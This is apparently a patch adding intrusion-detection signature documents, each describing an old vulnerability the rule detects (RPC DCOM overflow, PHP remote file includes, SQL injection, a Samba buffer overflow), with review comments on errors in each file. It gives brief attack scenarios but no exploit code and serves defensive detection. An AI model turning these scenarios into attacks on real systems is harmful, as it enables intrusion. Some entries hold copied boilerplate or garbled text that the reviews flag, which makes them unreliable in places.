+This event indicates that an attempt has been made to exploit a weakness in a host running the IISProtect web administration interface. A vulnerability exists that can allow an attacker to inject SQL code of his choice into the application.
+
+The attacker may be trying to gain administrator access to the host, garner information on users of the system, retrieve sensitive information or be attempting to execute arbitrary code.
+
+--
+Affected Systems:
+Any host using IIS with the IISProtect web administration interface.
+
+--
+Attack Scenarios:
+An attacker may inject SQL code of his choice. The attacker might then gain administrator access to the host or database.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+Check the IIS implementation on the host. Ensure all measures have been taken to deny access to sensitive files.
+
+Ensure that the IIS implementation is fully patched.
+
+Ensure that the underlying operating system is fully patched.
+
+Employ strategies to harden the IIS implementation and operating system.
+
+Check the host for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Bugtraq:
+http://www.securityfocus.com/bid/7675
+
+--
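Review bot: "Sid: 2130" is on a single line and followed by two blank lines, unlike the other files. Detailed Information and Attack Scenarios say "SQL code of his choice" where the rest of the patch uses "code of their choosing". The six Corrective Action items are generic IIS hardening and none addresses IISProtect itself, which is the component the rule is about; the first item ("Upgrade to the latest non-affected version of the software") should say which software it means.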
--- /dev/null
+++ b/doc/signatures/3393.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3393
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
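Review bot: Attack Scenarios contradicts Detailed Information: the former describes "a request for a file with an overly long filename via a network share" while the latter describes a malformed RPC DCOM request to an RPC port. One of the two was copied from another signature and should be corrected. "Expoit code exists" should be "Exploit code exists", and Additional References is empty even though Ease of Attack says exploit code exists, so an advisory is clearly available to cite.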
--- /dev/null
+++ b/doc/signatures/2562.txt
@@ -0,0 +1,72 @@
+Rule:
+
+--
+Sid:
+2562
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a vulnerability
+associated with the server component of McAfee's ePolicy Orchestrator (ePO).
+
+--
+Impact:
+A successful attack may permit an attacker to upload malicious code on
+the ePolicy Orchestrator server that may subsequently deliver the
+malicious code to ePolicy agents.
+
+--
+Detailed Information:
+There is a problem with access authentication in McAfee's ePolicy Orchestrator
+server.  This product is responsible for distributing packages and code to
+ePolicy agents, making this a potentially widespread and damaging attack in
+a network.  Because of a failure to authenticate credentials,
+an attacker can perform administrator functions, such as file uploads, by
+connecting the ePO web server.  The malicious files may be pushed to
+the ePO agents by the ePO Orchestrator.
+
+--
+Affected Systems:
+McAfee ePolicy Orchestrator 2.5.0
+McAfee ePolicy Orchestrator 2.5.1 before Patch 14
+McAfee ePolicy Orchestrator 3.0 before Patch 4 for 2.0 SP2A
+
+--
+Attack Scenarios:
+An attacker can attempt to upload a malicious file using the web
+server of the ePO Orchestrator. The file may be subsequently
+pushed by the Orchestrator to ePO agents.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+If a valid administrator connects to the ePO server and uploads
+files, the alert will trigger.
+
+--
+False Negatives:
+If the ePO server listens on a port other than 81, no alert will
+trigger.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References
+
+CVE:
+http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0038
+
+Bugtraq:
+http://www.securityfocus.com/bid/10200
+
+--
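Review bot: "by connecting the ePO web server" should be "by connecting to the ePO web server", and the "Additional References" heading is missing its colon. "ePO Orchestrator" expands to "ePolicy Orchestrator Orchestrator"; say "the ePO server". False Negatives reveals that the rule only watches port 81; that assumption is worth stating in Detailed Information as well, so readers know why a server on another port is missed.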
--- /dev/null
+++ b/doc/signatures/100000604.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+100000604
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "Indexu" application running on a webserver. 
+Access to the file "inv_send.php" using a remote file being passed as the 
+"admin_template_path" parameter may indicate that an exploitation attempt has 
+been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "admin_template_path" parameter in the "inv_send.php" 
+script used by the "Indexu" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Indexu
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
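Review bot: Three section separators in this file lack the blank line that precedes "--" everywhere else (after the Sid, after Affected Systems, and after Contributors), and there is a trailing blank line after the final "--". "ona web server" should be "on a web server", "the attackers choosing" should be "the attacker's choosing", and "may indicate that an exploitation attempt has been attempted" should be "may indicate an exploitation attempt".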
--- /dev/null
+++ b/doc/signatures/2165.txt
@@ -0,0 +1,59 @@
+Rule:
+
+--
+Sid:
+2165
+
+
+--
+Summary:
+This event is generated when a possible outgoing virus is detected. 
+
+--
+Impact:
+Informational event. An virus on an infected host may be attempting to 
+propogate.
+
+--
+Detailed Information:
+This event indicates that an outgoing email message possibly containing 
+a virus has been detected.
+
+This rule generates an event when a filename extension commonly used by 
+viruses is detected.
+
+--
+Affected Systems:
+Any host.
+
+--
+Attack Scenarios:
+This is indicative of a virus infection.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+A legitimate attachment to an email may generate this event.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check the host for signs of virus infection.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
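Review bot: Detailed Information says the rule fires "when a filename extension commonly used by viruses is detected" but never names the extension(s) the rule actually matches, so an analyst cannot judge the False Positives claim or tune the rule for a site that legitimately mails such attachments; list them. Impact is labelled "Informational event" while the same sentence says an infected host "may be attempting to propogate", which describes an active compromise rather than an informational condition; pick one and make Corrective Action ("Check the host for signs of virus infection") consistent with it. Typos: "An virus" should be "A virus", "propogate" should be "propagate".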
--- /dev/null
+++ b/doc/signatures/1772.txt
@@ -0,0 +1,65 @@
+Rule:
+
+--
+Sid:
+1772
+
+--
+Summary:
+This event is generated when an attempt is made to access the
+pbserver.dll component associated with the Microsoft Phone Book Service. 
+
+--
+Impact:
+Remote access. Malicious access of the pbserver.dll component can allow
+the execution of arbitrary commands on a vulnerable server.
+
+--
+Detailed Information:
+The Microsoft Phone Book Service allows dial-in clients to download
+phone book updates from the Internet Information Server (IIS) running
+the Phone Book Service.  The pbserver.dll is the Internet Services
+Application Programming Interface (ISAPI) that implements the update
+service.  A buffer overflow exists in pbserver.dll that may permit the
+execution of arbitrary commands on the server. 
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows 2000 Server
+
+--
+Attack Scenarios:
+An attacker can craft an HTTP request for a phone book update to a host
+running the Phone Book Service.
+
+--
+Ease of Attack:
+Simple. Exploit code is available.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Delete pbserver.dll if the Phone Book Service is unnecessary. 
+
+Apply the appropriate vendor supplied patches.
+
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+--
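Review bot: Additional References is empty for a documented buffer overflow for which "Exploit code is available"; add the Microsoft security bulletin and CVE entry so that "Apply the appropriate vendor supplied patches" points at a specific fix. Impact says the overflow "can allow the execution of arbitrary commands"; a buffer overflow yields arbitrary code execution, so use the wording the other signature files use. Affected Systems should also state that only hosts with the Phone Book Service installed are affected, which Corrective Action already implies ("Delete pbserver.dll if the Phone Book Service is unnecessary").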
--- /dev/null
+++ b/doc/signatures/384.txt
@@ -0,0 +1,53 @@
+Rule:
+
+--
+Sid:
+384
+
+--
+Summary:
+This event is generated when an generic ICMP echo request is made.
+
+--
+Impact:
+Information gathering.  An ICMP echo request can determine if a host is active.
+
+--
+Detailed Information:
+An ICMP echo request is used by the ping command to elicit an ICMP echo reply from a listening live host.  This rule alerts on a generic ICMP request where no payload is included in the message or the payload does not match more specific rules. 
+
+--
+Affected Systems:
+All
+
+--
+Attack Scenarios:
+An attacker may attempt to determine live hosts in a network prior to launching an attack.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+An ICMP echo request may be used to legimately troubleshoot networking problems.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Block inbound ICMP echo requests.
+
+--
+Contributors:
+Documented by Steven Alexander<alexander.s@mccd.edu>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+
+--
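Review bot: Corrective Action "Block inbound ICMP echo requests." is given without qualification while False Positives acknowledges that echo requests are used "to legimately troubleshoot networking problems"; recommend blocking only at the perimeter and note that the rule is almost purely informational wherever ping is permitted, otherwise it will be the noisiest rule in the set. The Detailed Information paragraph is a single very long line; wrap it to the column width used by the other files. Typos: "an generic" should be "a generic", "legimately" should be "legitimately".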
--- /dev/null
+++ b/doc/signatures/100000389.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000389
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "Ovidentia" application running on a webserver. Access to the file "approb.php" using a remote file being passed as the "babInstallPath" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "babInstallPath" parameter in the "approb.php" script used by the "Ovidentia" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Ovidentia
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
+
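Review bot: same template problem as the other remote file include entries: the third paragraph of Detailed Information and the whole Attack Scenarios section describe credential validation ("supply his/her own credentials to gain access"), which is not how a remote file include in the "babInstallPath" parameter is exploited. Replace them with the actual scenario (a remote URL supplied in the parameter is included and executed by the PHP interpreter). Fix "ona web server". The Affected Systems entry "All systems running CGI applications using Ovidentia" is circular; state the Ovidentia version range, or "all versions" if the advisory did not say. Additional References is empty although "Exploits exist"; cite the advisory. The paragraphs are also unwrapped single lines, unlike the rest of the corpus.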
--- /dev/null
+++ b/doc/signatures/100000139.txt
@@ -0,0 +1,63 @@
+Rule:
+
+--
+Sid: 
+100000139
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known 
+vulnerability in Microsoft Internet Information Server (IIS).
+
+-- 
+Impact: 
+Serious. Information Disclosure, application source code may be disclosed.
+
+--
+Detailed Information:
+A programming error in an error page for Microsoft IIS may result in the 
+discloure of asp code disclosure on an affected system.
+
+By making a request to a server using a modified SERVER_NAME variable, the 
+underlying asp code is displayed in the error page returned to the requestor if 
+the asp page generates an error.
+
+--
+Affected Systems:
+Microsoft IIS 6.0 and prior
+
+--
+Attack Scenarios: 
+An attacker can make a request to the server and modify the SERVER_NAME 
+variable to be either localhost or 127.0.0.1, if the page returns an error the 
+asp code is revealed.
+
+-- 
+Ease of Attack: 
+Simple. Exploit code exists.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors: 
+Original Rule writer rmkml <rmkml@free.fr>
+Sourcefire Vulnerability Research Team
+Alex Kirk <akirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
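Review bot: the Detailed Information sentence "may result in the discloure of asp code disclosure" is doubled and misspelt; it should read "may result in the disclosure of ASP source code". The attack depends on the client setting SERVER_NAME to "localhost or 127.0.0.1"; SERVER_NAME is populated from the request's Host header, so say so explicitly, because that header is what the rule has to match on and what an analyst will look for in the packet. "Microsoft IIS 6.0 and prior" is vague; list the versions confirmed affected. Additional References is empty even though "Exploit code exists"; add the vendor advisory.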
--- /dev/null
+++ b/doc/signatures/2366.txt
@@ -0,0 +1,59 @@
+Rule:  
+
+--
+Sid:
+2366
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in the PHP web application PhpGedView.
+
+--
+Impact:
+Execution of arbitrary code on the affected system
+
+--
+Detailed Information:
+PhpGedView contains a flaw such that it may be possible for an attacker
+to include code of their choosing by manipulating the PGV_BASE_DIRECTORY
+parameter when making a GET or POST  request to a vulnerable system.
+
+It may be possible for an attacker to execute that code with the
+privileges of the user running the webserver, usually root.
+
+--
+Affected Systems:
+	PhpGedView 2.65.1 and earlier
+--
+Attack Scenarios:
+An attacker can make a request to an affected script and define their
+own path to the PGV_BASE_DIRECTORY variable.
+
+--
+Ease of Attack:
+Simple. No exploit software required.
+
+--
+False Positives:
+None known
+
+--
+False Negatives:
+None known
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+Upgrade to the latest non-affected version of the software
+
+--
+Contributors:
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
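Review bot: "the privileges of the user running the webserver, usually root" is wrong. Web servers drop privileges and execute PHP as an unprivileged account (www-data, apache, nobody or similar), so the impact is code execution as that account, not root; remove "usually root". Detailed Information should also say how the include happens (a remote URL placed in PGV_BASE_DIRECTORY is included by PHP), since "include code of their choosing by manipulating the ... parameter" does not tell the analyst what to look for in the request. Minor: double space in "POST  request", and Affected Systems lacks the blank line before "--" used elsewhere.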
--- /dev/null
+++ b/doc/signatures/2530.txt
@@ -0,0 +1,61 @@
+Rule:
+
+--
+Sid:
+2530
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in the Microsoft implementation of SSL Version 3.
+
+--
+Impact:
+Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in the handling of SSL Version 3 requests that
+can be manipulated to cause a DoS condition in various software 
+implementations used on Microsoft operating systems.
+
+The condition exists because of poor error handling routines in the
+Microsoft Secure Sockets Layer (SSL) library. SSL requests containing an
+invalid field, sent to vulnerable systems can cause the affected host to stop 
+handling any further requests.
+
+--
+Affected Systems:
+	Microsoft Windows 2000, 2003 and XP systems using SSL
+
+--
+Attack Scenarios:
+An attcker needs to make an SSL request to an affected system that
+contains an invalid field.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+--
+Contributors:
+Sourcefire Research Team
+Matt Watchinski <mwatchinski@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
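Review bot: Detailed Information and Affected Systems talk about "various software implementations" and "Windows 2000, 2003 and XP systems using SSL" without naming the affected component or the bulletin, and Additional References is empty, so "Apply the appropriate vendor supplied patches" is not actionable; add the Microsoft Security Bulletin and CVE. The text also says the host will "stop handling any further requests" but not which process stops responding (every SSL consumer on the box, or one service); state it. Typo: "attcker" should be "attacker".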
--- /dev/null
+++ b/doc/signatures/3379.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3379
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
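Review bot: Attack Scenarios does not match Detailed Information. The detailed text describes "a malformed request to an RPC port" that overflows a buffer, but the scenario says "a request for a file with an overly long filename via a network share", which reads as SMB file access. If the overly long name is carried inside the DCOM RPC request itself, say so; "via a network share" will send analysts looking at the wrong protocol. Additional References is empty for a vulnerability with "Expoit code"; add the Microsoft bulletin and CVE. The Corrective Action's port list (135, 139 and 445, TCP and UDP) is good; keep it. Typo: "Expoit".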
--- /dev/null
+++ b/doc/signatures/100000642.txt
@@ -0,0 +1,74 @@
+Rule:
+
+--
+Sid:
+100000642
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "Indexu" application running on a webserver. 
+Access to the file "template_modify_file.php" using a remote file being passed 
+as the "admin_template_path" parameter may indicate that an exploitation 
+attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "admin_template_path" parameter in the 
+"template_modify_file.php" script used by the "Indexu" application running on a 
+webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Indexu
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
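Review bot: this document duplicates the Indexu "inv_send.php" entry word for word apart from the script name, including the mismatched boilerplate about "validating the credentials of a client host" and "supply his/her own credentials", neither of which describes a remote file include in "admin_template_path". Use the actual scenario (remote URL in the parameter, included and executed by PHP). Fix "ona web server". Blank lines before "--" are missing after "Sid:", after Affected Systems and after Contributors, unlike the other files. Additional References is empty although "Exploits exist".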
--- /dev/null
+++ b/doc/signatures/3268.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3268
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
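Review bot: this file is a verbatim copy of 3379.txt (same Summary, Detailed Information, Attack Scenarios and Corrective Action). Two distinct SIDs should document what distinguishes them (which RPC interface, transport or field each rule matches), otherwise an analyst seeing both fire cannot tell whether they are one attack or two. The same faults carry over: "via a network share" in Attack Scenarios does not fit the RPC vector described, "Expoit" is misspelt, and Additional References is empty.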
--- /dev/null
+++ b/doc/signatures/2055.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+2055
+
+--
+Summary:
+Versions of the software tracking system Bugzilla prior to 2.14.1 are 
+prone to a vulnerability that allows some degree of account hijacking.
+
+--
+Impact:
+False data may be represented in the bug tracking database.
+
+--
+Detailed Information:
+Versions of Bugzilla prior to 2.14.1 and cvs version 2.15 prior to 
+20020103 allow non-authorized users to post comments as any user of 
+their choosing, including non-valid usernames.
+
+A check to verify the user is valid when posting comments is not 
+performed correctly. Using this an attacker might post comments as 
+another user in the bugtraq database.
+
+--
+Affected Systems:
+Bugzilla versions prior to 2.14.1 and cvs versions prior to 2.15 (cvs20020103)
+
+--
+Attack Scenarios:
+The attacker can manually edit the page to pass his own version of 
+variables to the script handling the comments. This script in turn 
+passes the data directly to another script that handles the posting of 
+bugs without checking the user database.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Upgrade Bugzilla to the latest non-affected version.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-0008
+
+Bugzilla:
+http://www.bugzilla.org/security/2.14.1/
+http://bugzilla.mozilla.org/show_bug.cgi?id=108385
+http://bugzilla.mozilla.org/show_bug.cgi?id=108516
+
+--
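Review bot: "post comments as another user in the bugtraq database" should read "Bugzilla database"; Bugtraq is an unrelated mailing list. The Summary does not follow the "This event is generated when ..." form used by every other file and instead restates the vulnerability; rewrite it as an event description (an attempt to post a Bugzilla comment with a caller-supplied user identifier). Impact ("False data may be represented in the bug tracking database") is weaker than the Summary's "account hijacking"; align them. The Additional References section is the model the other files should follow.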
--- /dev/null
+++ b/doc/signatures/2103.txt
@@ -0,0 +1,66 @@
+Rule:  
+
+--
+Sid: 2103
+
+--
+Summary:
+
+A buffer overflow exists in the Samba file and print sharing software 
+that can allow a remote attacker to gain root privileges on the target 
+script to exploit this vulnerability.
+
+--
+Impact:
+
+An attacker can cause the target system running Samba to overflow a 
+buffer presenting the attacker with root privileges.
+
+--
+Detailed Information:
+It is possible for an anonymous user to cause a buffer overflow in a 
+character array by sending data greater than 1024 bytes to the variable 
+pname. This information is copied by another function causing the buffer
+overflow.
+
+Affected Systems:
+Samba versions 2.2.5 to 2.2.8
+
+may indicate an attacker verifying the root shell.
+
+--
+Attack Scenarios:
+The attacker needs to send pname a value larger than 1024 bytes.
+
+--
+Ease of Attack:
+Simple, an exploit script exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+No false negatives are known at this time.
+
+--
+Corrective Action:
+Upgrade to Samba versions 2.2.8a or Samba-TNG.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+Digital Defense
+http://www.digitaldefense.net/labs/advisories/DDI-1013.txt
+
+CVE
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0201
+
+--
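Review bot: several structural faults. The Summary is garbled: "gain root privileges on the target script to exploit this vulnerability" should presumably read "on the target system"; as written it is not a sentence. The "--" separator before "Affected Systems:" is missing, and the orphan line "may indicate an attacker verifying the root shell." under Affected Systems belongs to some other section (it looks like the tail of a sentence cut from Detailed Information). "Sid: 2103" is on one line whereas the other files put the number on its own line. Detailed Information should name the SMB request in which "pname" is carried so the reader knows what the rule matches; "the variable pname" on its own is opaque to anyone without the Samba source.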
--- /dev/null
+++ b/doc/signatures/100000536.txt
@@ -0,0 +1,75 @@
+Rule:
+
+--
+Sid:
+100000536
+--
+Summary:
+This event is generated when an attempt is made to exploit an SQL injection 
+vulnerability in the "IMGallery" application running on a webserver. Access to 
+the file "galeria.php" with SQL commands being passed as the "sort" parameter 
+may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to inject SQL code from a 
+remote machine via the "sort" parameter in the "galeria.php" script used by the 
+"IMGallery" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to compromise the database backend for the 
+application, the attacker may also be able to execute system binaries or 
+malicious code of their choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using IMGallery
+--
+Attack Scenarios:
+An attacker can inject SQL commands to the backend database for an application 
+if user input is not correctly sanitized or checked before passing that input 
+to the database.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+SQL Injection Attack and Defense
+http://www.securitydocs.com/library/3587
+
+--
+
